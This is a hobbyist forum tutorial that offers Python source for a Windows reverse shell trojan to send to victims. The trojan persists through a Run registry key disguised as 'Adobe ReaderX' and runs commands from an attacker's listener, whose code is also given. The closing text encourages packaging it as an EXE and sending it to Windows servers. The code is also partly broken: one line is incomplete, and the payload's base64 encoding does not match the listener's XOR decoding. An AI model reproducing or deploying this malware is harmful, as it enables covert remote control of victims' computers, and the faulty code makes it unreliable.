Reverse Shell tutorial

Hey guys, Finlay here. Today I present you a reverse shell script I've built during some boredom. I have the proof that it works here: View the Proof! Here is the "" (which you send to the victim):

```python
# Please support me and my development by making a donation to:
# BTC: 1Gay22nGSs5tXArmABtSHGjKQTerMpptFV

import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
    # Copy executable to %TEMP%:
    os.system('copy %s %s'%(fileName, tempdir))

    # Queries Windows registry for the autorun key value
    # Stores the key values in runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey =[]
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass

    # If the autorun key "Adobe ReaderX" isn't set this will set the key:
    if 'Adobe ReaderX' not in runkey:
        try:
            key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
            SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass

def shell():
    #Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('', int(1998)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit":
            break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = +
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()
```

Please note that you need to change the IP and port to suit your scenario. Also, here is the (which should be running on your box!):

```python
import socket

s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 1998))
s.listen(2)
print "Listening on port 1998... "

(client, (ip, port)) = s.accept()
print " Received connection from : ", ip

while True:
    command = raw_input('~$ ')
    encode = bytearray(command)
    for i in range(len(encode)):
        encode[i] ^=0x41
    client.send(encode)
    en_data=client.recv(2048)
    decode = bytearray(en_data)
    for i in range(len(decode)):
        decode[i] ^=0x41
    print decode

client.close()
s.close()
```

So these scripts are built fairly easily, and are probably not very effective. But when you build them to an EXE (PyInstaller, anyone?), send them to a Windows server, and boom, you're a god now! (sorta...) Please use these scripts for education only! I'm not going to help you if you get in trouble!

